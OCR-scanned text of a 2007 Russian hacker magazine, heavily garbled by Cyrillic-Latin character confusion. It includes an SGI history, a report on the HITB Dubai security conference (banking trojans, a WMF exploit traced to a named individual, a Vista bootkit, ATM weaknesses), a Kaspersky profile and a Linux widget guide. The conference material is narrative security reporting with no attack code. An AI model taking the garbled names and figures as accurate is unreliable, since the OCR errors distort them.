все были счастливы, вплоть до релиза ѴѴІпсІоѵѵз 95. Місгозой неожиданно 
решила пересмотреть свою политику в отношении 561, вместо нее Билл 
Гейтс сотоварищи купил компанию РепсІегппогрЫсз, ІЫеІ., которая разра- 
ботала АРІ под названием РеаІііуБаЬ. После покупки компании, АРІ дора- 
ботали в соответствии с нуждами Місгозо!!;, переименовали в БігесіЗБ и 
включили в ѴѴІпсІоѵѵз 95. А приложения, использующие брепбЦ каким-то 
мистическим образом отказывались работать под ѴѴІпсІоѵѵз 95, хотя под N1 
работали великолепно. За этим выпадом последовала настоящая война 
двух стандартов. Місгозой все ми силами пыталась замедлить развитие 
брепбЦ навязывая производителям программного обеспечения, видео- 
карт и прочего свои условия. Война завершилась спустя два года полной 
победой Місго5ой — приведя БігесіЗБ в приличный вид и сделав его 
компонентом БігесіХ, она всеже ввела в ѴѴІпсІоѵѵз 95 частичную поддержку 
брепбЦ а от остальных претензий со стороны 561 просто отмахнуалась. 

Но 1995 и 1996 годы оказалисьдля 5ІІісоп бгарЫсз весьма успешными, и 
о предыдущих неудачах руководство компании поспешило забыть. Акции 
взлетели в цене и стоили больше, чем акции Місгозой — чем не поводдля 
гордости? В свет вышла приставка N іпіепсіо 64, явившаяся результатом 
разработок56І. Аэто означало, что с каждой проданной консоли компания 
будет получать свою долю, бкрыленныетаким положением дел, руководи- 
тели компании совершили роковую ошибку — приобрели за 764 миллионов 
долларов бгау РезеагсЦ своего крупного и давнишнего конкурента, тоже 
занимавшегося разработкой сверхмощных компьютеров. Все перспектив- 
ные разработки бгаутутже свернули и продали другим компаниям, обязав 
компанию отныне работать только над серверами 561. Например, линейка 
суперкомпьютеров 5ирегзегѵег досталась 5ип Місгозузіетз, и эта покупка 
по сей день приноситей немалые доходы и пользу. Параллельно сэтим 
5ІІІсоп бгарЫсз представила миру очередную собственную разработку 
— рабочую станцию 62, функционирующую на новейшей архитектуре II МА. 
бднако в 561 слишком ранозабыли о МісгозоЫ А Місгозой вплотную 
занималась потребительским рынком, обеспечивая домашние компьюте- 
ры все более и более серьезными мощностями на базе процессоров ІЫеІ.. 
Началосьто, что предсказал в 1 994 году Джеймс Кларк, — персональные 



компьютеры стали отниматьу56І кусокхлеба. Крометого, появились 
компании ЗБЫ и пѴісІіа, основанные, кстати, ушедшими из 5Шсоп бгарЫсз 
сотрудниками, ббе компании были ориентированы на графику и охотно 
сотрудничали с Місгозоіі. 

О Конец эпохи 501 

1997 год для 561 стал переломным, бначала было объявлено о 37 мил- 
лионахдолларовубытка за первый квартал года, за этим заявлением 
последовало массовое сокращение штата сотрудников. Уволили около 
1 0ОО человек, и еще несколько человексами оставили высокие посты в 
компании, последовав примеру доктора Кларка. Продажи компании стре- 
мительно падали, Місгозоіі окончательно подминала под себя рынок. В 
начале 1998 годау56І сменился и генеральный директор. Эд Мак-Кракен, 
принимавший участие в жизни 5Шсоп бгарЫсз с момента ее основания, 
оставил свой пост, и новым руководителем стал Рик Белуццо, большой 
поклонник Місгозой. Первым же делом он объявил о заключении с упомя- 
нутой компанией договора по разработке совместного АРІ — РаНгепНеіі. 
Проектнеувенчался успехом, и его дольно быстро свернули, а Місгозоііза 
это время, используя разработки 561, усовершенствовала БігесіХ, в итоге 
сделав его главным АРІ для ѴѴІпсІоѵѵз вообще. 

Белуцииже пошел ещедалыше. В 1998 годуон объявил о начале рабо- 
ты над новой линейкой рабочих станций — ѴізиаІѴѴогкзіаііоп на базе 
процессоров ІЫеІ и на 66 ѴѴІпсІоѵѵз N1. Ничего страшного в этом не было, 
из ѴізиаІѴѴогкзіаііоп получились неплохие машины, поступившие в 
продажу в 1999 году. Но цена их все равно оставалась слишком высокой по 
сравнению саналогами, скажем, с ОБИ, и продажи пошли очень плохо. 10 
августа 1999 года было официально заявлено о глобальной реструктуриза- 
ции компании. 561 должна была продатьфилиалы ѴізиаІѴѴогкзіаііоп, МІР5 
и бгау, полностью перейти на процессоры ІЫеІ Мегсеб и отказаться отсвоих 
разработок в области графических карт, используя карты сторонних произ- 
водителей. 23 августа того же года Рик Белуцци уволился из 561, предпочтя 
наблюдать за крахом компании со стороны. 6н перебрался в столь любимую 
им М іеговой, где впоследствии стал исполнительным директором. 
Печальная развязка наступила 8 мая 2006 года — несколько лет медлен- 
ной агонии привели 561 к банкротству. В штате компании осталось всего 
2200 человек (против прежних 12000), и 561 окончательно утратила вес на 
рынке. Компания подала прошение в суд, основанное на 1 1 -ой поправке, 
суть которой втом, что неплатежеспособную или плохо управляемую 
компанию, выгоднее реструктурировать, чем ликвидировать. Ксентяб- 
рютого же года реструктуризацию почти закончили, полностью сменив 
весь совет директоров, всехтоп-менеджеров и сократив количество 
сотрудников до 1 600 человек. Абывший офис56І отошел в распоряже- 
ние компании боодіе. 

Что будет дальше с 561, покажет время. Но вряд ли когда-нибудь ей снова 
удастся стать тем, чем она была когда-то. Это тот редкий случай, когда 
известный принцип, согласно которому незаменимых людей не бывает, не 
сработал — с уходом Джеймса Кларка из компании ушла душа. ИИ 
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шин фмнзла - МуЗ ТБ Нп.ід Лбюв 



В финале приняли участие 
10 самых эрудированны* 
геймеров из Красноярс- 
ка. Краснодара. Санкт- 
Петербурга, Краснокам- 
ска, Нижнего Новгорода, 
Таганрога и Москвы. 

В увлекательной интел- 
лектуальной викторине 



7 апреля 

в московском ком- 
пьютерном клубе 
4бзте прошел финал 
крупнейшего конкуров 
для геймеров, органи- 
зованного компанией 
ііешопіс Ат! 

С ноября 2006г. 
в конкурсе приняло 
участие более 6 000 
читателей журналов 
«Страна Игр» т «РО 
ИГРЫ** и посетителей 
свита датеіаті.ш! 



МѴ 1 № 



&,№* 












ШШ 



Нз СВ«И К ЧС-ИПЪКЧРрЗІ ѴНІСТИНКИ стісчали 
ні ойпрПСь! пЪ игрні ЕЮсЧгдгііС 



они боролись за главный 



приз - бесплатную экс- 
курсию по ведущим иг- 
ровым студням Еіесігопіс 
Ат в США. Канаде 
и Европе! 



Дл и тбі, б го 
не п курсе... 



Еіссііппіс ДгСз- ■ чраішныілг > мири гидліилыі рзэрайШ'чик 
чсрииънттііркых ныіцдонги йіиіо-дщм киіи-рам^ уинде-і н шнг гзкии 
ііилминиіые иі риыьш ш-ріім ык Нес и Риг БрсссІ ВэІІІеГісМ ТНс 
5ІП5 РІРА ННІ. НМ БІзсЬ & ШНіІс КЕпСНг и друі ки. СГ»дли ЕА 
рзспшшнкны ПО нсиму миру, иг Аііі и і;о Ківды 
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МкПа КІЗІІІ5ІП 

Всіііо г- Іп -С Л ісІ 
Оатсіагиі Сотрапу 
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коробке 

:К Ш ТНЕ ВОХ 2007 В ДУБАЕ 



ІЧЬй!).:^ * 

Хек в ,. 

ОТЧЕТ О КОНФЕРЕНЦИИ НАСК Ш ТНЕ ВОХ 2007 I 



Твоя школьная учительница по биологии всю жизнь считала, что хек — это такая рыба. 
На самом же деле, хек — это специальное занятие, которым каждый день занимается 
несколько миллионов талантливых людей по всему миру. Бывает такое время, когда все 
эти люди слетаются в одно место и занимаются хеком друг с другом, демонстрируя свои 
навыки и последние идеи. Этой весной, со 2-го по 5 апреля, хеком занимались в Дубае, 
на конференции НІТВ (Наск Іп ТЪе Вох — Хек В Коробке) . 



вонітв 

Вообще-то, НІТВ — это очень молодая конференция, впервые про- 
веденная в 2003 году в Куала-Лумпуре малазийским хлопцем БЗЗісКсІ 
ѵѵд. За 4 года существования НІТВ стала одной из самых авторитетных 
беер кпоѵѵіесіде конференций: на нее приезжалита кие люди, какБрюс 
Шнайер, Жанна Рутковска и другие. 

По своей сути, НІТВ — это не массовая увеселительная хакерская тусов- 
ка, это йеер Кпоѵѵіесіде Сопіегепсе — конференция глубоких знаний, куда 
приезжаютте люди, которым реально есть, что показать, и те, которые 
действительно хотят послушать и поучиться. В качестве спикеров всегда 
приглашаются самые авторитетные специалисты; участие в конферен- 
ции в качестве слушателя стоит не самых смешных денег и сама структу- 
ра мероприятия рассчитана на одну-две сотни человек, не больше. 

В качестве партнеров конференции уже несколько лет выступаюттакие 
компании, как Місговоіі, НеѵѵІеЛ Раскагб, Зсапіі и т.д. Причем это обсто- 



ятельно не мешаетспикерам показывать уничижительные презентации 
о продуктах этих уважаемых компаний, прежде всего, понятное дело, 
о продуктах МісгозоЛ. Не бываеттакого, чтобы на НІТВ не был показал 
новый способ взлома осей мелкомягких. Однако, к их чести, они не 
тушуются и привозят собственных специалистов, которые горячо спорят 
с докладчиками, пытаясь выгородить родную систему :]. 

Впрочем, не буду забегать вперед. 

ОДубай 

Мы собиралисьлететь на НІТВ вдвоем со Степом, ноу нашего любителя 
РС-зоны и ВѴО-диска случился обломос с бдительными бюрократичес- 
кими институтами: из-за пяти судимостей и претензий по неуплаченным 
алиментам оттрех бывшихжен Степу не дали вовремя загран и оставили 
негодяя на родине. В итоге в Дубай я отправился один: пять часов лета на 
стареньком Ил 82 мимо Астрахани, вдоль всего Каспийского моря, чуть- 
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> Команда НІТВ'а. Слева - І_33ісігаѵѵд, самый главный :) 



чуть над Ираном — и я в месте, где Аравийская пустыня 
обрезается Персидским заливом, где скопилось 1 0% всех 
запасов нефти и, соответственно, нефтедолларов. 

Я прилетел вечером 3 апреля, и первым делом надо было 
отыскать пафосную пятизвездочную гостиницу ОиЬаі 
ЗЬегаІоп Сгеек, где сутра стартовала конференция НІТВ. 
Тгаіпіпд-часть НІТВ, состоящая из четырех образователь- 
ныххакерских курсов, была проведена 2-го и 3-го числа. 
Сама же конференция стартовала Дапреля. 

Достаточно быстро сориентировавшись поубогой гости- 
ничной карте, я отыскал этот отель и весь вечер заворожено 
гулял потеплым, влажным и поросшим пальмами улицам 
Дубая. Это на удивление приятный город, где очень много 
реально богатых людей. Местное население очень четко 
следует своим культурным традициям: женщины ходят в 
платках (это не мешает каждой второй водить ЗИК 500), а 
мужики — в белых одеждах и кожаных шлепанцах. 
Оченьмногов Эмиратах иностранцев: как турья, так и рабо- 
тающих людей. Узнать иностранцев очень просто: они одеты 
в привычную европейцу одежду. 

Работать в Эмираты приезжают из Таиланда, Индии, Индо- 
незии и прочих стран юго-восточной Азии. 

□ Конференция 

Проснувшись сутра достаточно рано, я отправился уже 
по знакомому маршруту к ЭИегаІоп Сгеек на первый день 
конференции. У столика регистрации милая малазийс- 
кая девушка Ату очень обрадовалась логотипу на моей 
визитке: «ОЛісіаІ тебіа рагіпег :]. ТЬаСз сооі, I ваѵѵіЫв Іодо» 
— и позвала СЗЗЫЙѵѵд’а, организатора конференции, с 
которым я до этого общался только по мылу. Л итдог оказался 
веселым парнем. Он очень переживал по поводу конферен- 
ции — она начиналась уже скоро, и, обменявшись со мной 
несколькими фразами, он проводил меня в зал, где уже стал 
собираться народ. 

□ Внутри Р-5есиге 

Конференция стартовала очень мощной и яркой презента- 
цией финна Микко Ха йпонена на тему электронной преступ- 
ности. Микко — это достаточно известный чувак, который 



>Хакер-наркдемонстрирует новую футболку 

работает руководителем отдела исследований в Р-5есиге 
— конторе, которая занимается вопросами электронной бе- 
зопасности и предоставляет кучу сервисов в этой области: 
начиная с зесигііу-консалтинга и заканчивая собственным 
антивирусом и файрволом. 

Речь финна была зомбирующе хороша: он говорил прямо, 
не прячась за обтекаемыми формулировками, и зрелищно 
демонстрировал интересные вещи. 

Начал он с небольшого пиара своей компании: показал 
внутренности системы, с помощью которой они исследуют 
вирусы. Скрытый от интернета ѵѵеЬ-интерфейс системы 
(Микко подключился к корпоративной ѴРЫ) показывает 
всю статистику и предоставляет доступ кописаниям многих 
тысяч вредоносных бинарников. По каждой заразе строится 
подробный репорт: какие ключи в реестре создает, какие 
руткит-технологии использует, какие хуки ставит, в какие 
процессы инжектится, какие строчки ищет и т. д. В общем, 
полное описание всей функциональности. 

Для примера финн открыл описание довольно стандарт- 
ного банковского трояна, одного изтех, которые получили 
сейчас очень широкое распространение. Он прячется в 
системе с помощью хитрых руткит-технологий, перехваты- 
вает формы, инжектится в іехріогег.ехе и 
ехріогег.ехе, ищет строки с доменами популярных банков, 
е-доісі, ѵѵебтопеу и т.д. По всей видимости, внутри реализо- 
ван процесс автозалива: человекзаходит на свой аккаунт, и 
после пройденной авторизации тайком совершается тран- 
закция по переводу части денег на хакерский счет. В общем, 
достаточно стандартный современный троян, написанный, 
наверное, где-то на территории СНГ. 

Лаборатория Р-5есиге получаеттроянов изтрех источников: 

1. Из спама: в виде аттачей и присылаемых ссылок. С по- 
мощью рассылоксейчас распространяется оченьбольшое 
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>На нашем дискеты 
найдешь все мате- 
риалы с НІТВ 2007: 
16 злободневных 
весигку- 
презентаций. 




> На диске лежит 
видеоотчето конфе- 
ренции, который я 
снял для тебя на свою 
камеру :). 




> ѵѵѵѵѵѵ.Ыі:Ь.огд — сайт 
конференции. Там 
можно найти фо- 
тографии с конфы, 
видео с предыдущих 
мероприятий, атак- 
же все материалы и 
информацию о новых 
ивентах. 

врогаѵѵ.ііѵефигпаі. 
сот — блог врОгаѵѵ, 
где есть следы не- 
допонимания между 
ним и компанией 
Р-5есиге. 
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> Помещение, где проводились хакерские соревнования. Слева за столом - это команда американских спецов, которые круто облажались 



число вирусов, поэтому спам вносит значимый вклад в пополнение баз 
Р-5есиге. 

2. Из ЬопеуроШсетей, главным образом под ѴѴІпсіоѵѵб, конечно: сети 
непропатченных машин ходят по самым разным сайтам в поисках тех, на 
которых им с помощью сплойтов загрузяттрояна. 

3.0т пользователей софта: юзеры посылают найденные вирусы в лабора- 
торию на изучение. 

Для анализа вирусов спецы Р-5есиге используютспециальную техноло- 
гию, которая анализирует все изменения, осуществляющиеся заразой 
всистеме. Делается впарзЬоі системы до установки трояна и после нее. 
Разница фиксируется в видеХМБ-документа, который можетбыть краси- 
во отображен с помощью специальной программы. Она строитдиаграм- 
мы со всеми ресурсами системы, выделяя красным цветом те, которые 
добавились или изменились послеустановкитроя. В целом выглядит 
неплохо :). 

ВѴѴНоагеІНеу? 

Вторая часть презентации была еще интереснее. Микко рассуждал отом, 
кто такие хакеры и каким образом они получают баблос с вирусов итроя- 
нов, предложив следующий список источников хакерского заработка: 

• кража банковских аккаунтов; 

• кража личной информации: етаіі, номеров социального страхования 
И пр. ; 

• кража номеров СО; 

• кража аккаунтов электронных платежных систем; 

• ООоЗ, спам; 

• кража акков для покера, букмекерских контор и т.д. 

В этом же контексте он показал забавную схему. На карте мира по очереди 



у каждого континента появлялись подписи стем, кто, где и чем зани- 
мается. По его статистике, в штатах больше всего занимаются спамом 
и фишингом, из южной Америки исходит угроза троянов, а плашечка со 
сплоитами и направленными атаками стоит напротив Китая и Азии. Мик- 
ко выдержал паузу и дал присутствующим присмотреться к схеме: явно 
несуразно выглядела пустота на территории России. 

После этого он нажал пробел на своем ноутбуке — и показалась самая 
большая и грозная плашка: из России, Белоруссии, Украины и всех стран 
СНГ исходятвсе возможныеугрозы. 

Дальнейшие рассуждения финна протекали в следующем ключе: если ты 
крутой талантливый программист и родился в Штатах или Европе — будь 
уверен: хорошая работа и куча лавэтебе обеспечены. Аесли родился в 
Сибири — знай:твой путь клавэ лежиттолько через электронную пре- 
ступность. Пиши трояна и поднимай бабло. 

В выступлении наступил кульминационный момент, который Микко 
грамотно развил. Он рассказал об одном его небольшом расследовании. 
Чуть больше чем год назад чуваки из Р-5есиге увидели в сети первый 
ѴѴМР-эксплойт, который был установлен на нескольких дедиках и загру- 
жал троев. Они начали его изучать и сразуже выложили ссылку на сплоит 
на своем сайте. 

Втеле сплоита они, после долгого ресеча, нашли странную строку: 
«ОбООКО 078». Мудрый финн подумал и решил, что она тут не просто так. 
Случайнозайдя на один российский сайт, посвященный безопасности, 
он нашел коммент под выложенным сплоитом, содержащий нецензурную 
брань чувака с ником зрОгаѵѵ, сводящуюся к приблизительно следующе- 
му: «Суки, слили мазу :(». Зайдя на сайт ѵѵѵѵѵѵ.врогаѵѵ.ги и найдя ЖЖ Спо- 
ра ва, Микко выяснил о нем много интересного: что ему 21 год, что живет 
он в Питере и что водит Мегвесіев 5600. «ІСз а дооб сагЬга 21 -оШ сЫІсІ», 
— сказал финн и открыл пост, где Спорав писал о небольшой аварии с его 
участием. На одной из фотографий отчетливо виден номер его машины: 
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>Хакер - официальный медиапартнер НІТВ и мне было очень приятно видеть логотип своего журнала рядом с РЬгаск : 



ОбООКО 78 — та самая строка из сплоита. 

По-русски финн читать толком неумеет, поэтому не нашел еще один 
интересный постСпорава: 

«В распространении ѵѵппі'-эксплойта виноваты АНТИ В И РУС НИКИ Е-5есиге. 



О Продолжение 

Конференция была построена так, что одновременно показывались 
сразу две презентации и необходимо было выбирать. Впервыйденья 
составил для себя такое расписание:Оіддіпд іпіо 5Ы М Р 2007; РоЬЬІпд 



«ЗАПРОСИВ У БАНКОМАТА $100, ПОЛЬЗОВАТЕЛЬ МОГ ЗА- 
БРАТЬ 4 ИЗ ПЯТИ 20-ДОЛЛАРОВЫХ БУМАЖЕК, АОДНУ ОС- 
ТАВИТЬ В АППАРАТЕ. БАНКОМАТЖДАЛ МИНУТУ И СЪЕДАЛ 
ДЕНЬГИ, ПОПУТНО ОТМЕНЯЯ ТРАНЗАКЦИЮ ЦЕЛИКОМ И 
ВОЗВРАЩАЯ НА СЧЕТ ПОЛЬЗОВАТЕЛЯ ВСЕ $1 00. ПРИ ЭТОМ В 
КАРМАНЕУ ЮЗЕРА ОСТАВАЛИСЬ 80 БАКСОВ НАЛОМ :|» 



Еще неделю назад этот эксплойт стоял на нескольких хостах и спокойно 
выполнял свою работу. Тихо, мирно, никому не мешая. Однако послетого как 
Р-5есиге опубликовал в своем ѵѵеЫод'е линк на заражение, этотэксплойт тут 
же украли и выложили на всех веси гііу- порталах. Итеперьтольколенивый 
неставитего на свой хост. Вопрос: кто же добился та кой ситуации, что при 
ипраІсЬесІ Ьид эксплойт сейчас на «каждом углу» в интернете?» 

Позже, когда я болтал с Микко, он очень интересовался ЗрОгаѵѵ, явно 
впечатленный возможностями крякера из Санкт-Петербурга. Действи- 
тельно, талантливый малый. 



Вапкз: Еазіег йопеТНап ЗаісІ; ѴЬооІ КІС Сотрготізіпд ѴѴІпсІоѵѵз Ѵізіа 
Зесигііу и Паѵаде ІМеазЬесІ: ТЬеТасбсаІѴоІРТооІкіІ:. 

Наибольший интерес для меня представляли вторая итретья презента- 
ции о взломебанков и Висты, посколькусЗЫМРятолком не работал, да и 
презентация имела достаточно специфический характер. 

Выступление же о взломе Висты однозначно было одним из самых глав- 
ных событий. Спикерами были братья Випин и Нитин Кумар их Индоне- 
зии. Забавные ребята, которые на потрясающем английском (смотри и 
слушай видео на 0Ѵ0) изложили интересную концепцию взлома Висты. 



/ 103 



ХАКЕР 05 /101/ 07 







ш 8есСоп(7007 ^ Оу 



> Баннер у входа на конференцию 



В качестве пути для повышения полномочий в системе они предложили 
создать собственный хакерский загрузочный сектор и с его помощью 
выполнить код на уровне ядра. Разработка получила название ѴЬооікіІ 
и была реализована в виде загрузочного ізо-образа диска, при загрузке 
с которого любой пользователь мог выполнять код на уровне ядра. Кон- 
цепт, понятное дело, локальный, но очень лихо обделал все встроенные в 
Ѵізіа механизмы защиты. 

На нашем диске, кстати, лежит презентация с полными сорцами — мо- 
жешь поупражняться :). 

Очень забавная вещь произошла во время выступления: один прилично 
одетый молодой человекто и дело нервно задавал вопросы, уточняя тех- 
нические детали, и что-то все время недовольно комментировал. К концу 
выступления Випин спросил чувака прямо: «Агеуои ітот М іеговой»? 
Оказалось, что парень был действительно из Майкрософта. Беднягу 
послали выгораживать Висту, если создастся трудная ситуация :). 

Что касается взлома банков, то лично я из этой презентации со смачным 
названием «Ограбить банк: проще сделать, чем сказать» для себя вынес 
не много нового. РаЬгісе Магіе рассказал об общих проблемах банковс- 
кихтехнологий. Все атаки он разделил натри части: атаки банкоматов, 
сетевые атаки и прямые атаки банковских приложений. Проблемы 
банковской безопасности он обозначил такие: 

• Магнитные банковские карты —устаревшая и несовершенная техноло- 
гия. Все карты могут быть легко скопированы. 

• Банкоматы могутбыть«протроянены»с помощью скимерского обору- 
дования. 

• Подключение банкоматов ксети можетбыть взломано, и произойдет 
утечка информации. Как правило, подключение банкоматов на физичес- 
ком уровне небезопасно. 

• Нередко все АТМ банка используют один итотже код для аутентифика- 
ции в процессинговом центре банка. 

В конце презентации Фабрис привел несколько забавных случаев из его 
практики. В Бангкоке он видел целую сеть банкоматов, у которых прямо 
на видулежал Х25-модем, который можно было отключить, подрубить к 
ноутбуку и прослушиватьтрафик. 



В славном городе Тайпэй был банк, банкоматы которого страдали 
другой, даже более забавной «болезнью». Запросив у банкомата, к 
примеру, $1 00, пользователь мог забрать только 4 из пяти20-долларо- 
вых бумажек: $80. Банкоматждал минуту и «съедал» деньги, попутно 
отменяя транзакцию. В итоге юзер получал $80 налом, а счетего не 
изменялся :). 

□ Парень из Ыеі-Зяиаге 

Из второго дня мне больше всего запомнилась презентация крутого 
дядьки из Ыеіъздиаге — Шрирая Шаха о взломе ѴѴЕВ-сервисов и А0АХ- 
движков. Он разложил все по полочкам и привел весьма занимательную 
статистику: 

• С55-баги присутствуют на 14,5% всех сайтов; 

• 50І_-инъекции можно реализовать на 1 0% ресурсов; 

• столько же буферов подвержено переполнениям; 

• 3% некорректно работаютс файлами, можно перемещаться и просмат- 
ривать файловую систему. 

Отдельное место в презентации занял А]’ахег — тулза для аіах- 
Лпдегргіпііпд’а. С помощью достаточно примитивных операций она 
определяет, какой движок используется. 

□ СаІсНІНеНад 

Параллельно с конференцией, в соседнем помещении проходили 
хакерские соревнования Саріиге ТНе Над. В этом году участвовало три 
команды: полицейские Дубая (ТЕАМ ЕБЕЕТЕ), американские военные 
(АРМУ 5ТР0ЫѲ) и команда хакеров из Болгарии (ЫйТЕАМ). Все зада- 
ния были направлены на реверс-инжиниринг и взлом бинаниковпод 
виндой и ІІпіх. Особеннотут рассказывать нечего, крометого что все 
участники облажались: только болгары смогли пройти задание нуле- 
вой сложности. Амеры и Дубайские полицейские оказались, как сказал 
БЗЗісШѵѵд, «Іа те, геаіу Іа те» :). А призовой фонд в 6 тысяч долларов 
переносится в Малайзию: на осенний НІТВ, который будет в сентябре. 
Смотри, можешь слетать — поднять бабла :). Амеры-то, видишь, какие 
ламеры отборные, цс 
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Я решил рассказать тебе о самом известном российском 
компьютерщике. О ком именно, догадаться несложно. И так 
очевидно, что фамилию «Касперский» знает любой юзер, даже 
в Намибии. Вот наша справка об одном из лучших мировых 
специалистов по борьбе с вирусами. 



БИОГРАФИЧЕСКАЯ СПРАВКА 

Евгений Валерьевич Касперский родился в 1965 году в 
городе Новороссийске. Родители Евгения были математика- 
ми, они впоследствии и познакомили парня с программиро- 
ванием. Образование для программиста Касперский полу- 
чил блестящее: сначала физико-математическая школа, 
потом Институт криптографии при высшей школе КГБ. 

После окончания института Евгения отправили в армию. К 
счастью, умного и перспективного молодого человека не 
заставили рыть окопы, а устроили работать в закрытое НИИ 
при генштабе войск СССР. В 1987 году старший лейтенант 
Касперский познакомился с будущей женой Натальей, и это 
знакомство стало определяющим событием в его жизни. Но 
не менее интересное знакомство ждало его в виртуальном 
мире. На компьютер Евгения попал Савсасіе — распро- 
страненная в конце восьмидесятых электронная зараза. 
Раздраженный сбоями в работе компьютера, программист 
решил сам все исправить. Нашел зараженные файлы, 
написал утилиту, которая их восстанавливала. Но за первым 
вирусом появился второй, за вторым — третий... Утилита 
стремительно превращалась в полноценный антивирус. 

Это хобби вскоре даже помогло Евгению заработать — он 
заключил несколько контрактов, гарантирующих установку 
антивируса на компьютеры. 



А тем временем начался 1991 год. В военных кабинетах 
Касперскому делать становится уже нечего. Он уходит в 
компанию «КАМИ». «КАМИ» была одной из первых компа- 
ний в ИТ-сфере, появившихся после развала СССР. В ком- 
пании Касперский получает возможность заниматься люби- 
мым делом — разработкой антивирусной защиты. Евгений 
выступает на конференциях, пишет статьи в журналы и 
мало-помалу становится известной личностью в компью- 
терном мире. АпбѴігаІ Тооікіі Рго распространяется среди 
пользователей, аббревиатура «АѴР» уже перестает быть 
пустым звуком. Как вспоминает Евгений, с 1991 по 1994 год 
он работал по 12 часов в сутки, все время отдавая разработке 
продукта. Усилия оправдались с лихвой. К 1994 году в «КАМИ» 
существует уже целый антивирусный отдел, хоть и работа- 
ет там всего несколько человек. В 1994 году Гамбургский 
университет публикует свое тестирование антивирусных 
программ. Гигантов рынка Ыогіоп и йосіог Эоіотоп оставил 
далеко позади проект малоизвестного тогда в мире Евгения 
Касперского. 

В антивирусный отдел приходит жена Касперского Наталья. 
Она становится менеджером, регистрируя продукт и зани- 
маясь маркетингом. В 1997 году по"ее инициативе Евгений 
организует свою компанию — «Лабораторию Касперского». 
Наталья становится генеральным директором, он сам 
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> Коробка с лицензионным Каспером 



> Стартовая страница казрегзку.ги 



руководителем антивирусных исследований. 
Сегодня в «Лаборатории Касперского» работает 
600 человек в 10 странах мира. Антивирус Касперского 
стал одним из самых популярных антивирусов в мире. 
Евгений — член организации исследователей компьютер- 
ных вирусов (САПО), а проводимая его компанией ежегод- 
ная конференция Ѵішз Виііебп — крупнейшее событие в 
области разработки антивирусов. 

У Евгения растут двое сыновей. 

ПРОЕКТЫ 

Естественно, проекту Касперского один — это его компа- 
ния и антивирус. Но такой проект стоит десятка других! 
Вспомним основные вехи развития продукта. 

1992 год впервые использованы внешние антиви- 
русные базы, появилась возможность обновления. 
Программа дополнена механизмом распознавания неиз- 
вестных вирусов. 

1996 год выход АѴР 3 на новом ядре. Поддерживаются вне- 
шние базы, эвристические анализаторы, модули обнаружения 
вредоносных программ. АѴР меняет название на «Антивирус 
Касперского». Из-за того что бренд «АѴР» был зарегистри- 
рован только в России, за границей начинают появляться 
АѴР-Малайзия, АѴР-Бразилия и прочие. И чтобы не дать раз- 
гуляться плагиаторам, потребовалось переименование. 



1998 год — «Лаборатория Касперского» первой в мире 
выпускает антивирус под 05/2. 

1999 год — открытие первого зарубежного офиса компа- 
нии. Казрегзку БаЬз ІЖ появилась в Великобритании. 

2000 год — выпуск версии антивируса под Ыпих ЕгееВЗР. 
2002 год — на рынке появляются файрвол Казрегзку Апб- 
Наскеги система защиты от спама Казрегзку Апб-Зрагп. 



ХОББИ 

Евгений любит ездить на машине, катается на отечес- 
твенной «девятке». Увидишь «Жигули» с надписью 
«аЬизейказрегзку.сот» на багажнике — знай, это едет 
Касперский. Увлекается рыбалкой. Утверждает, что одно 
из его любимых занятий — колоть дрова. Путешествует, 
особенно восхищен природой Камчатки. Также был заме- 
чен в качестве горнолыжника. НЕ 



ссылки 

ѵууѵѵѵ. казрегзку. ги — официальный сайт «Лаборатории 
Касперского»; 

уѵѵѵѵѵ.ѵігизІізТсот — вирусная энциклопедия; 
ѵуу ѵѵѵ.казрегзкѵсІиЬ.согп/ги — фан-клуб «Лаборатории 
Касперского»; 

ууууѵѵ. Ьид^гад.ги/ІіЬгагѵ/тізс/казрег.Ь^тІ - интервью с 
Евгением Касперским. 






І^МАІЬ, 



«ЕСЛИ ПОЛАГАТЬ, ЧТО АНТИВИРУСНЫЕ КОМПАНИИ ЗАНИМА- 
ЮТСЯ «ВИРУСОПИСАТЕЛЬСТВОМ», ТО СТРАШНО ДАЖЕ ПОДУ- 
МАТЬ, ЧТО ДЕЛАЕТ МЧС» 
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В Ілпих существует множество способов приукрасить и сделать индивидуальным свое рабочее окруже- 
ние. Перестройке поддается практически все. Можно изменить обои, значки, оконный менеджер, ис- 
пользовать ЗЭ-окружение вроде ХСЬ или АІСЬХ. Одним из интересных вариантов является ЗирегКагатЬа 
— программа для графического интерфейса КГ)Е, позволяющая создавать на рабочем столе интерак- 
тивные приложения (ѵѵісі^еі:) . Получается не только очень красиво, но и весьма удобно, так как нужное 
приложение или индикатор всегда находится под рукой. 



О Что такое БорекКакамва 

Первой ласточкой была КагатЬа ( кагатЬа.зЕпеі ). созданная автором Хан- 
сом Карлсоном (Напз Кагіззоп). Она включала в себя ряд модулей и настра- 
ивалась исключительно с помощью конфигурационных файлов. Сейчас 
проектзаброшен, последняя версия 0.17датирована 14апреля 2003 года. 
Но хорошие идеи зря не пропадают, и упавший флаг был вскоре подхва- 
чен энтузиастами. Приблизительнотак и возник проектЗирегКагатЬа 
[ пеТсІгадоп.зГпеІ: ]. совместимый по модулям с КагатЬа. Кстати, если до 
недавнего времени этот проект, можно сказать, развивался отдельно, то 
теперьон официально входитв состав последней версии КОЕ. 

Вообще говоря, ЗирегКагатЬа представляетсобой стартовую площадку, 
которая сама по себе ничего не делает, да и неумеет. Все функции реа- 
лизуются с помощью дополнительных модулей-апплетов. Имеющиеся 
сегодня модули позволяютуправлять проигрыванием музыки и видео, 
показывать различную системную информацию, атакже информацию из 
интернета (сводки новостей, погоды, наличие почты на сервере). С по- 
мощью ЗирегКагатЬа можно создавать панели различного назначения, 
выводить на рабочий стол небольшие игры. 

ОУСТАНОВКАБцРЕРКаРАМВА 

Пакеты ЗирегКагатЬа присутствуют в репозитариях практически 
всех популярных дистрибутивов. Так, для установки в КиЬипІи следует 
ввести «зисіо арі-деі іпзІаІІзирегкагатЬа». В АЬЫпих пакет называется 
ксІеиЫз-зирегкагатЬа. 



Послеустановки значокдля запуска помещается в меню КйЕ. При 
первом запуске ЗирегКагатЬа появляется окно настройки, позволяющее 
установитьапплеты. Апплеты представляют собой файлы с расширением 
зкі (переименованный гір] или іЬете. Первые обычно включают в себя 
три составляющие:тестовый файл, в котором определен внешний вид 
ТЬете; скрипты на РуіЬоп (.ру), задача которых добавить интерактив- 
ность; графические ресурсы, используемыедляукрашения. 

Очень большой список апплетов находится на сайте ѵѵѵѵѵѵ.ксіе-іоок.огд . 
Самые популярныеудобнее отбирать и загружать в самой ЗирегКагатЬа. 
В этом случае, чтобы получить апплет, необходимо нажать «Скачать 
апплеты», после чего появится окно, предназначенное для их выбора. 

